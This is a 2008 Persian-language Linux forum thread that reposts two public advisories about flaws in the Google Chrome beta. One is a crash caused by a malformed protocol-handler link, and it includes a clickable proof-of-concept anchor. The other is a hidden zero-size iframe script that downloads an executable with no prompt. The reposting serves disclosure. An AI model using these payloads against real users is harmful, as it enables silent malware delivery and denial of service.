انجمن های گفتگوی جامعه کاربران لینوکس استان یزد
02 آذر 1387,ساعت 08:10:37 *
خوش آمدید، مهمان - لطفا برای ثبت نام اینجا و یا برای ورود اینجا را کلیک کنید.
آیا هنوز ایمیل فعال سازی حساب کاربری برای ما ارسال نشده است؟

لطفا برای ورود نام کاربری و رمز عبورتان را وارد نمایید
اخبار: كدام موضوع لينوكس شما را بيشتر جذب ميكند؟
 
   فهرست   راهنمايي جستجو تقویم ورود عضويت  
صفحه: [1]
  چاپ صفحه  
نويسنده موضوع: Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability  (دفعات بازدید: 129 بار)
L0pht
کاربر فعال
***
آفلاین آفلاین

جنسيت : پسر
تعداد ارسال: 126

تشكر
-اهدا شده: 15
-دريافت شده: 89


Nothing [at] all


WWW
« : 15 شهريور 1387,ساعت 23:22:44 »

Chrome گوگل هنوز متولد نشده باگ داد.
بیسش Apple WebKit یا همون KHTML . فبلا Konqueror و safari از این موتور استفاده می کردن.
دانلود خود مرورگر:
http://www.google.com/url?sa=t&oi=promos&cad=hppweb%3Aen_extra&ct=pro&cd=1&url=http%3A%2F%2Fwww.google.com%2Fchrome%2Findex.html%3Fhl%3Den%26brand%3DCHMG%26utm_source%3Den-hpp%26utm_medium%3Dhpp%26utm_campaign%3Den&ei=TH3ASLjhGoS81QaeoqjeBw&usg=AFQjCNFeJfUcsxcHmhekcG2LMdMHdZdYWw&sig2=HEt-yfn27RmjaTpSNSyBog
البته زیاد هم پر خطر نیست اما تا حالا باگ زیاد داده.

کد:
Software:
Google Chrome Browser 0.2.149.27

Tested:
Windows XP Professional SP3

Result:
Google Chrome Crashes with All Tabs

Problem:
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version
0.2.149.27. A crash can result without user interaction. When a user is made to visit
a malicious link, which has an undefined handler followed by a 'special' character,
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the
EIP register at 0x01002FF4.

Proof of Concept:
http://evilfingers.com/advisory/google_chrome_poc.php

Credit:
Rishi Narang (psy.echo)
www.greyhat.in
www.evilfingers.com
---------------------------------------------------

PoC Working/Exploit:
Click for a demo <a href="EVIL:%">HERE</a>

مشاهده كاربراني كه از این پست تشكر كرده اند:

lord.t, SAEJ

براي اين پست, 2 كاربر تشكر كرده اند
خارج شده است

...We Share Our Knowledge So
[root@our-mind]#chmod 777 ourmind
=============================
Snoop-Security.com with new Design
L0pht
کاربر فعال
***
آفلاین آفلاین

جنسيت : پسر
تعداد ارسال: 126

تشكر
-اهدا شده: 15
-دريافت شده: 89


Nothing [at] all


WWW
« پاسخ #1 : 17 شهريور 1387,ساعت 19:30:13 »

دومیش هم پابلیک شد.
کد:
Author: nerex
 E-mail: nerex[at]live[dot]com

 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
 downloaded to the user's computer without any user prompt.

 This proof-of-concept was created for educational purposes only.
 Use the code it at your own risk.
 The author will not be responsible for any damages.

 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

مشاهده كاربراني كه از این پست تشكر كرده اند:

SAEJ

براي اين پست, 1 كاربر تشكر كرده اند
خارج شده است

...We Share Our Knowledge So
[root@our-mind]#chmod 777 ourmind
=============================
Snoop-Security.com with new Design
صفحه: [1]
  چاپ صفحه  
 
پرش به :  

Powered by SMF 1.1.7 | SMF © 2006, Simple Machines LLC | Developed by Aftab Javid Pars | Hosted by Dibagroup